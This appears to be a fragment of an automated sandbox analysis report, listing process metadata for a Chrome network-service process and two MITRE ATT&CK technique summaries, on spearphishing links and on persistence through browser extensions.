MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Target ID:	11
Start time:	11:16:15
Start date:	16/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1908,i,8825835104048177361,13493979304147720564,262144 /prefetch:8
Imagebase:	0x7ff6c4390000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. Spearphishing may also involve social engineering techniques, such as posing as a trusted source.
Tactics:	Initial Access
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre